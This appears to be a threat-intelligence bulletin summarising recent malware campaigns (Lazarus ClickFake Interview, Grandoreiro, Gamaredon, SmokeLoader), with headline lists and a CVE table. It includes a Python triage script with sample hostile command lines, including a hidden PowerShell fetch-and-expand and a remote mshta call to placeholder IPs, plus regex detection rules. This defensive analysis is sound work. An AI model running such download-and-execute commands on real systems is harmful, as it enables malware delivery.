ClickFake Interview campaign leverages fake crypto recruitment scheme to deliver GolangGhost
In February 2025, Sekoia researchers observed a campaign by the North Korean threat actor Lazarus Group, dubbed ClickFake Interview, targeting job seekers within the cryptocurrency industry. The campaign leverages fake job offers, legitimate-looking job interview websites, and the ClickFix tactic to execute the GolangGhost backdoor and FrostyFerret. The infection chain varies by operating system, with both Windows and macOS systems targeted by the campaign. ClickFake Interview initially shares URLs on social media, inviting victims to a fake online cryptocurrency-related interview. Victims are asked to record an introductory video with their camera; the site then displays an error message instructing the user to download a driver. The user is then prompted to follow a ClickFix prompt to update their driver: on Windows a VBScript is used to download and execute the GolangGhost backdoor, while on macOS a bash script executes FrostyFerret before launching GolangGhost. ClickFake Interview is believed to be a continuation of the Contagious Interview campaign.
RolandSkimmer campaign uses malicious browser extensions to steal financial data
Fortinet researchers observed a credit card skimming campaign, dubbed RolandSkimmer, targeting individuals in Bulgaria. The campaign leverages malicious browser extensions across Google Chrome, Microsoft Edge, and Firefox to harvest and exfiltrate sensitive financial data from users. The attack begins with a malicious ZIP file containing a deceptive LNK file, which deploys obfuscated VBScripts to establish persistent and covert access. The attacker then downloads additional files, with malicious JavaScript payloads and encoded RAR files used to install the malicious browser extensions, depending on the target browser. The attackers also replaced legitimate Microsoft Edge shortcuts in the Desktop and Taskbar with the malicious shortcuts.
Phishing campaigns distribute Grandoreiro banking trojan to Latin America and Europe
Forcepoint researchers observed a resurgence in Grandoreiro banking trojan activity, with the malware currently being distributed in large-scale phishing campaigns to banking users in Latin America and Europe. Threat actors leverage VPS hosting providers and obfuscation techniques to evade detection, as well as dynamic URLs and social engineering to maximize the malware’s reach and effectiveness. A recent campaign, targeting Mexico, Argentina, and Spain, impersonates tax agencies and uses fraudulent government emails to trick users. The emails are marked as high importance and contain malicious URLs that redirect users to a site on the Contabo hosting service, where they are prompted to download a PDF, which in turn downloads a ZIP file. The ZIP file leads victims to download an obfuscated VBScript and an EXE payload disguised as an Acrobat Reader error pop-up designed to steal credentials.
Gamaredon targets Ukrainian users with war-related lures to deliver Remcos backdoor
Cisco Talos researchers discovered a suspected Gamaredon campaign, ongoing since at least November 2024, targeting Ukrainian users with malicious LNK files that ultimately deliver the Remcos backdoor. The LNK files are compressed inside ZIP archives and often disguised as Office documents, named using Russian words related to the movement of troops in Ukraine as a lure. The researchers believe that Gamaredon is likely maintaining its technique of sending phishing emails with a ZIP file attached or containing a link to download the file from a remote host. The LNK files contain PowerShell code that downloads and executes the next-stage payload in ZIP format, as well as a decoy file. The ZIP payload contains an executable binary that loads a malicious DLL via DLL sideloading, which in turn serves as the loader for Remcos.
First Ukrainian International Bank users targeted with Emmenhtal to deliver SmokeLoader
G DATA researchers discovered a campaign impersonating First Ukrainian International Bank to deliver the Emmenhtal malware loader to users. The malware was observed being chained with SmokeLoader, enabling the attackers to deploy additional malware dynamically using SmokeLoader’s modular capabilities. The campaign starts with an email claiming to confirm a payment has been made. The email contains a 7z archive file attachment with supposed payment instructions, which, once extracted, reveals a decoy PDF file and a PDF shortcut. The latter is used to download a file from a remote server that executes mshta via PowerShell to download Emmenhtal, which is later used to deploy SmokeLoader.
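The Windows chains summarised above share a few process-level patterns a defender can hunt for: an LNK-launched PowerShell fetching a ZIP (Gamaredon), PowerShell launching mshta against a remote URL (Emmenhtal), and a VBScript run from the shell after a ClickFix prompt. The following is an added example, not code from any of the cited reports; the sample events, hostnames and paths are constructed placeholders and the rules are heuristics meant for triage rather than a finished detection.

```python
import re
from typing import List

# Constructed sample process-creation events (not real telemetry), shaped after the
# chains described above. Hosts and paths are placeholders.
SAMPLE_EVENTS = [
    {"id": 1, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell -w hidden -c iwr http://203.0.113.10/next.zip -OutFile $env:TEMP\n.zip; Expand-Archive $env:TEMP\n.zip"},
    {"id": 2, "parent": "powershell.exe", "image": "mshta.exe",
     "cmdline": "mshta http://203.0.113.20/payment/instructions.hta"},
    {"id": 3, "parent": "explorer.exe", "image": "wscript.exe",
     "cmdline": r"wscript C:\Users\u\AppData\Local\Temp\driverupdate.vbs"},
    {"id": 4, "parent": "explorer.exe", "image": "powershell.exe",   # benign admin use
     "cmdline": r"powershell -c Get-ChildItem C:\Reports"},
    {"id": 5, "parent": "explorer.exe", "image": "mshta.exe",        # local HTA, no URL
     "cmdline": r"mshta C:\Tools\local_app.hta"},
]

URL = r"https?://"
DOWNLOAD = r"(iwr|invoke-webrequest|downloadfile|downloadstring|start-bitstransfer|curl)"

# Each rule: name, parent image regex, child image regex, command-line regex.
# Parent/child are matched in full, the command line by search; all case-insensitive.
RULES = [
    ("lnk_powershell_zip_download", r"explorer\.exe", r"powershell\.exe",
     rf"{DOWNLOAD}.*{URL}.*\.zip|{URL}.*\.zip.*expand-archive"),
    ("powershell_spawns_remote_mshta", r"powershell\.exe", r"mshta\.exe", URL),
    ("clickfix_script_host_from_shell", r"explorer\.exe", r"(wscript|cscript)\.exe",
     r"\.vbs\b"),
]

def classify(event: dict) -> List[str]:
    """Return the names of every rule the event matches (empty list if none)."""
    hits = []
    for name, parent_re, image_re, cmd_re in RULES:
        if (re.fullmatch(parent_re, event["parent"], re.I)
                and re.fullmatch(image_re, event["image"], re.I)
                and re.search(cmd_re, event["cmdline"], re.I)):
            hits.append(name)
    return hits

def triage(events: List[dict]) -> dict:
    """Map event id -> matched rule names, keeping only events that fired."""
    result = {}
    for event in events:
        hits = classify(event)
        if hits:
            result[event["id"]] = hits
    return result
```

Feeding real process-creation telemetry (e.g. Sysmon event ID 1 fields) through `classify` only needs the parent image, image and command line mapped onto the same keys.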
Ransomware
- An in-depth look at Black Basta’s TTPs – Intel471 Blog – Apr 02 2025
- Crimelords at Hunters International tell lackeys ransomware too ‘risky’ – The Register – Security – Apr 02 2025
- DragonForce Claims to Be Taking Over RansomHub Ransomware Infrastructure – The Cyber Express – Apr 02 2025
- A Rebirth of a Cursed Existence? – The Babuk Locker 2.0 – Rapid7 – Apr 02 2025
- Qilin affiliates spear-phish MSP ScreenConnect admin, targeting customers downstream – Sophos – Apr 01 2025
- National Defense Corporation victim of ransomware attack; discloses breach and declines to pay any ransom – DataBreaches.net – Mar 31 2025
- Fake Zoom Ends in BlackSuit Ransomware – The DFIR Report – Blog – Mar 31 2025
Financial Services
- ‘Salvador Stealer’ Targets Banking Customers with Sophisticated Malware – TechNadu – Apr 02 2025
- “Urgent reminder” tax scam wants to phish your Microsoft credentials – Malwarebytes Labs Blog – Apr 01 2025
- TsarBot Android Malware Mimics 750 Banking & Finance Apps to Steal Credentials – CyberSecurityNews.com – Mar 30 2025
- Exposing Crocodilus: New Device Takeover Malware Targeting Android Devices – Threat Fabric Blog – Mar 28 2025
- Multiple crypto packages hijacked, turned into info-stealers – Sonatype – Mar 27 2025
Geopolitics
- Moscow Subway Website Hit by Cyberattack in Apparent Retaliation for Attack on Ukrainian Railways – Bitdefender – Apr 03 2025
- DPRK IT Workers Expanding in Scope and Scale – Google Cloud Threat Intelligence – Apr 01 2025
- Operation HollowQuill: Malware delivered into Russian R&D Networks via Research Decoy PDFs – Seqrite Blog – Mar 31 2025
- Russian Phishing Uses Fake CIA Sites to Target Anti-war, Ukraine Supporters – HackRead – Mar 28 2025
- OpIsrael 2025: Hacktivist Coordination Intensifies Ahead of April 7 – Threat Reports – Radware – Mar 26 2025
High Priority Vulnerabilities
| Name | Software | Base Score | Temp Score | Related |
|---|---|---|---|---|
| CVE-2025-0282 | Neurons for ZTA gateways | 9.0 | 7.7 | RESURGE malware used to create web shells following Ivanti Connect Secure compromise |
| CVE-2024-20439 | Smart License Utility | 9.8 | 9.4 | CISA Warns of Active Exploitation of Cisco Smart Licensing Utility Flaw |
| CVE-2024-31982 | xwiki-platform-search-ui | 9.8 | 7.0 | Exploit attempts observed targeting XWiki OS command injection flaw |
| CVE-2020-8515 | Vigor300B | 9.8 | 9.8 | Targeting of DrayTek routers observed amidst reports of reboots |
| CVE-2025-24201 | macOS | 8.8 | 6.0 | Apple patches multiple zero-day flaws in iPhone, iPads, and macOS Sonoma |